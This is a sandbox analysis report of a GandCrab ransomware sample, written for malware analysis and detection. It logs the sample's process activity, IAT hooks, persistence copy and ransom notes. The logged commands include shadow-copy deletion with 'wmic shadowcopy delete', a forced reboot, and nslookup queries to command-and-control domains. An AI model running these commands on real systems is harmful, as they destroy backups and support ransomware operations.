Gandcrab Ransomware v3.0.1 | Sequential Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win10_64 | exe
Classification: Dropper, Downloader, Ransomware

8a1e66b4834499dacc24abb27733c387733d919070fc504b14ee865678952559 (SHA256)

2018-05-22_13-47-32.exe

Windows Exe (x86-32)

Created at 2018-05-22 08:11:00

...

Notifications (2/3)

Due to a reputation service error, no query could be made to determine the reputation status of any contacted URL.

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The operating system was rebooted during the analysis.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xef8 Analysis Target High (Elevated) 2018-05-22_13-47-32.exe "C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe" -
#2 0xf24 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #1
#4 0x5c8 Child Process System (Elevated) nslookup.exe nslookup ransomware.bit ns2.wowservers.ru #1
#6 0xcb8 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #1
#8 0x6ac Child Process System (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #1
#10 0xd44 Child Process System (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f #1
#12 0xe58 Child Process System (Elevated) shutdown.exe shutdown -r -t 60 -f #10
#18 0x8e8 Autostart High (Elevated) tlgmea.exe "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe" -
#19 0x9e0 Child Process High (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #18
#21 0xb98 Child Process High (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #18

Behavior Information - Sequential View

Process #1: 2018-05-22_13-47-32.exe
8482 35
»
Information Value
ID #1
File Name c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe
Command Line "C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:04:10
OS Process Information
»
Information Value
PID 0xef8
Parent PID 0x5dc (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x EFC
0x F00
0x F04
0x F08
0x F0C
0x F10
0x F14
0x F18
0x F1C
0x CE0
0x CD8
0x B34
0x 6A8
0x D40
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00073fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x00077fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000080000 0x00080000 0x00087fff Pagefile Backed Memory Readable, Writable True False False -
crypt32.dll.mui 0x00080000 0x00089fff Memory Mapped File Readable False False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00153fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000140000 0x00140000 0x00147fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00167fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x00160000 0x00160fff Memory Mapped File Readable, Writable True True False
...
private_0x0000000000170000 0x00170000 0x00172fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000180000 0x00180000 0x00182fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001b1fff Private Memory Readable, Writable True False False -
locale.nls 0x001c0000 0x0027dfff Memory Mapped File Readable False False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x002c0fff Private Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x002d0fff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002fafff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000300000 0x00300000 0x00300fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000300000 0x00300000 0x00303fff Pagefile Backed Memory Readable True False False -
private_0x0000000000310000 0x00310000 0x00313fff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x00356fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x003e7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000330000 0x00330000 0x0036ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x00346fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000350000 0x00350000 0x0038ffff Private Memory Readable, Writable True False False -
private_0x0000000000370000 0x00370000 0x003affff Private Memory Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x00390fff Private Memory Readable, Writable True False False -
private_0x00000000003a0000 0x003a0000 0x003a0fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000003a0000 0x003a0000 0x003effff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000003a0000 0x003a0000 0x003dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003b0000 0x003b0000 0x003b0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003e1fff Pagefile Backed Memory Readable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False -
mswsock.dll.mui 0x003f0000 0x003f2fff Memory Mapped File Readable False False False -
2018-05-22_13-47-32.exe 0x00400000 0x04b6dfff Memory Mapped File Readable, Writable, Executable True True False
...
pagefile_0x0000000004b70000 0x04b70000 0x04c27fff Pagefile Backed Memory Readable True False False -
private_0x0000000004c30000 0x04c30000 0x04d2ffff Private Memory Readable, Writable True False False -
private_0x0000000004d30000 0x04d30000 0x04e2ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004e30000 0x04e30000 0x04fb7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004fc0000 0x04fc0000 0x05140fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005150000 0x05150000 0x0654ffff Pagefile Backed Memory Readable True False False -
private_0x0000000006550000 0x06550000 0x0662ffff Private Memory Readable, Writable True False False -
private_0x0000000006550000 0x06550000 0x065cffff Private Memory Readable, Writable True False False -
private_0x00000000065d0000 0x065d0000 0x0660ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000006610000 0x06610000 0x06611fff Pagefile Backed Memory Readable True False False -
private_0x0000000006620000 0x06620000 0x0662ffff Private Memory Readable, Writable True False False -
private_0x0000000006630000 0x06630000 0x0681ffff Private Memory Readable, Writable True False False -
private_0x0000000006630000 0x06630000 0x067effff Private Memory Readable, Writable True False False -
private_0x0000000006630000 0x06630000 0x0672ffff Private Memory Readable, Writable True False False -
private_0x0000000006730000 0x06730000 0x0676ffff Private Memory Readable, Writable True False False -
private_0x00000000067e0000 0x067e0000 0x067effff Private Memory Readable, Writable True False False -
private_0x0000000006810000 0x06810000 0x0681ffff Private Memory Readable, Writable True False False -
private_0x0000000006820000 0x06820000 0x0691ffff Private Memory Readable, Writable True False False -
private_0x0000000006920000 0x06920000 0x06a1ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x06a20000 0x06d56fff Memory Mapped File Readable False False False -
ole32.dll 0x06d60000 0x06e48fff Memory Mapped File Readable False False False -
private_0x0000000006d60000 0x06d60000 0x06e5ffff Private Memory Readable, Writable True False False -
private_0x0000000006e60000 0x06e60000 0x06f5ffff Private Memory Readable, Writable True False False -
private_0x0000000006f60000 0x06f60000 0x0705ffff Private Memory Readable, Writable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73fb0000 0x741b8fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x741c0000 0x74205fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74210000 0x74217fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x74220000 0x7437ffff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74380000 0x74403fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74410000 0x7445dfff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x74460000 0x74506fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74510000 0x74517fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74520000 0x7454ffff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x74550000 0x74560fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x74570000 0x74830fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74840000 0x7486efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x74870000 0x7488afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74890000 0x748a2fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x748b0000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x74ae0000 0x74b9efff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ba0000 0x74bbcfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74bc0000 0x74c34fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74c40000 0x74cd0fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74d70000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74eb0000 0x75024fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x75070000 0x7507efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75080000 0x750c3fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x750d0000 0x755acfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x755b0000 0x7696efff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76ca0000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76f60000 0x76f6bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76f70000 0x7708ffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x77090000 0x77249fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x773d0000 0x773d5fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x775e0000 0x7760afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x777f0000 0x77833fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x778a0000 0x7792cfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x77930000 0x7798bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77990000 0x77a0afff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77ad0000 0x77ad6fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x77ae0000 0x77aedfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x77ba0000 0x77c31fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007feaa000 0x7feaa000 0x7feacfff Private Memory Readable, Writable True False False -
private_0x000000007fead000 0x7fead000 0x7feaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory Readable, Writable True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory Readable, Writable True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory Readable, Writable True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ffc03e6ffff Private Memory Readable True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 278 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000002e0000:+0xbec 5. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:VirtualAlloc+0x0 now points to 2018-05-22_13-47-32.exe:+0x1cf77b0
...
IAT private_0x00000000002e0000:+0xbec 6. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:PrepareTape+0x0 now points to private_0x000000007fff0000:+0x4ec3a201
...
IAT private_0x00000000002e0000:+0xbec 7. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0xb328d
...
IAT private_0x00000000002e0000:+0xbec 8. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:FindFirstVolumeMountPointW+0x0 now points to private_0x000000007fff0000:+0x7ccc66d2
...
IAT private_0x00000000002e0000:+0xbec 9. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:AddConsoleAliasA+0x0 now points to private_0x000000007fff0000:+0x520e0060
...
IAT private_0x00000000002e0000:+0xbec 10. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetThreadTimes+0x0 now points to private_0x000000007fff0000:+0x6c2f1aec
...
IAT private_0x00000000002e0000:+0xbec 11. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:lstrlenA+0x0 now points to private_0x000000007fff0000:+0x3a020270
...
IAT private_0x00000000002e0000:+0xbec 12. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0x5593f6f4
...
IAT private_0x00000000002e0000:+0xbec 15. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:SetStdHandle+0x0 now points to private_0x000000007fff0000:+0x1e15684
...
IAT private_0x00000000002e0000:+0xbec 18. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to private_0x000000007fff0000:+0x70fe8d13
...
IAT private_0x00000000002e0000:+0xbec 20. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:PulseEvent+0x0 now points to rpcrt4.dll:NdrServerInitializeMarshall+0x18230
...
IAT private_0x00000000002e0000:+0xbec 21. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:WideCharToMultiByte+0x0 now points to private_0x000000007fff0000:+0x190c0a14
...
IAT private_0x00000000002e0000:+0xbec 22. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:InterlockedIncrement+0x0 now points to private_0x000000007fff0000:+0x3dc307d5
...
IAT private_0x00000000002e0000:+0xbec 23. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:InterlockedDecrement+0x0 now points to private_0x000000007fff0000:+0x40b10d25
...
IAT private_0x00000000002e0000:+0xbec 24. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:InterlockedExchange+0x0 now points to private_0x000000007fff0000:+0x4e040a36
...
IAT private_0x00000000002e0000:+0xbec 25. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x7c0711fa
...
IAT private_0x00000000002e0000:+0xbec 26. entry of 2018-05-22_13-47-32.exe 4 bytes ntdll.dll:RtlEncodePointer+0x0 now points to private_0x000000007fff0000:+0x13151372
...
IAT private_0x00000000002e0000:+0xbec 27. entry of 2018-05-22_13-47-32.exe 4 bytes ntdll.dll:RtlDecodePointer+0x0 now points to private_0x000000007fff0000:+0x3401eafc
...
IAT private_0x00000000002e0000:+0xbec 28. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:Sleep+0x0 now points to private_0x000000007fff0000:+0x47b62cc2
...
IAT private_0x00000000002e0000:+0xbec 30. entry of 2018-05-22_13-47-32.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x754884db
...
IAT private_0x00000000002e0000:+0xbec 32. entry of 2018-05-22_13-47-32.exe 4 bytes ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x000000007fff0000:+0x5b01caa2
...
IAT private_0x00000000002e0000:+0xbec 33. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x5c57545e
...
IAT private_0x00000000002e0000:+0xbec 34. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to 2018-05-22_13-47-32.exe:+0x1acf176
...
IAT private_0x00000000002e0000:+0xbec 37. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetStartupInfoW+0x0 now points to private_0x000000007fff0000:+0x81ce036
...
IAT private_0x00000000002e0000:+0xbec 38. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetCPInfo+0x0 now points to private_0x000000007fff0000:+0x7df1ec53
...
IAT private_0x00000000002e0000:+0xbec 40. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x906ec28
...
IAT private_0x00000000002e0000:+0xbec 41. entry of 2018-05-22_13-47-32.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x7efef02c
...
IAT private_0x00000000002e0000:+0xbec 42. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:LCMapStringW+0x0 now points to private_0x000000007fff0000:+0x18575d7c
...
IAT private_0x00000000002e0000:+0xbec 43. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:UnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x5fc957f1
...
IAT private_0x00000000002e0000:+0xbec 44. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x6fcecec3
...
IAT private_0x00000000002e0000:+0xbec 45. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x18008656
...
IAT private_0x00000000002e0000:+0xbec 46. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x6393f3ee
...
IAT private_0x00000000002e0000:+0xbec 47. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to 2018-05-22_13-47-32.exe:+0x2e30a26
...
IAT private_0x00000000002e0000:+0xbec 54. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x6c8f4630
...
IAT private_0x00000000002e0000:+0xbec 56. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b450d03
...
IAT private_0x00000000002e0000:+0xbec 58. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0xafc8a12
...
IAT private_0x00000000002e0000:+0xbec 59. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0xf553751
...
IAT private_0x00000000002e0000:+0xbec 60. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0x3d8c1cd0
...
IAT private_0x00000000002e0000:+0xbec 61. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to private_0x000000007fff0000:+0x6042305
...
IAT private_0x00000000002e0000:+0xbec 66. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x28d8fd1b
...
IAT private_0x00000000002e0000:+0xbec 69. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x7c753526
...
IAT private_0x00000000002e0000:+0xbec 72. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetLocaleInfoW+0x0 now points to 2018-05-22_13-47-32.exe:+0x283a625
...
IAT private_0x00000000002e0000:+0xbec 74. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x7e525f13
...
IAT private_0x00000000002e0000:+0xbec 78. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:GetLocaleInfoA+0x0 now points to private_0x000000007fff0000:+0x24a018fc
...
IAT private_0x00000000002e0000:+0xbec 80. entry of 2018-05-22_13-47-32.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007fff0000:+0x7c326b52
...
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tlgmea.exe 319.01 KB MD5: 0f8ee2aca89c33231a50ac71c1e7761a
SHA1: f6a19a9971ee098b4868c86a444216e236bff37e
SHA256: 8cfac092eee191351171af55f912e66bfd120ec62fe0ec792f56b10aa88cb761 		False
...
c:\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\$recycle.bin\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\$recycle.bin\s-1-5-18\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\$recycle.bin\s-1-5-21-1462094071-1423818996-289466292-1000\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\perflogs\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\program files\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\program files (x86)\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\recovery\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\recovery\windowsre\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\system volume information\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
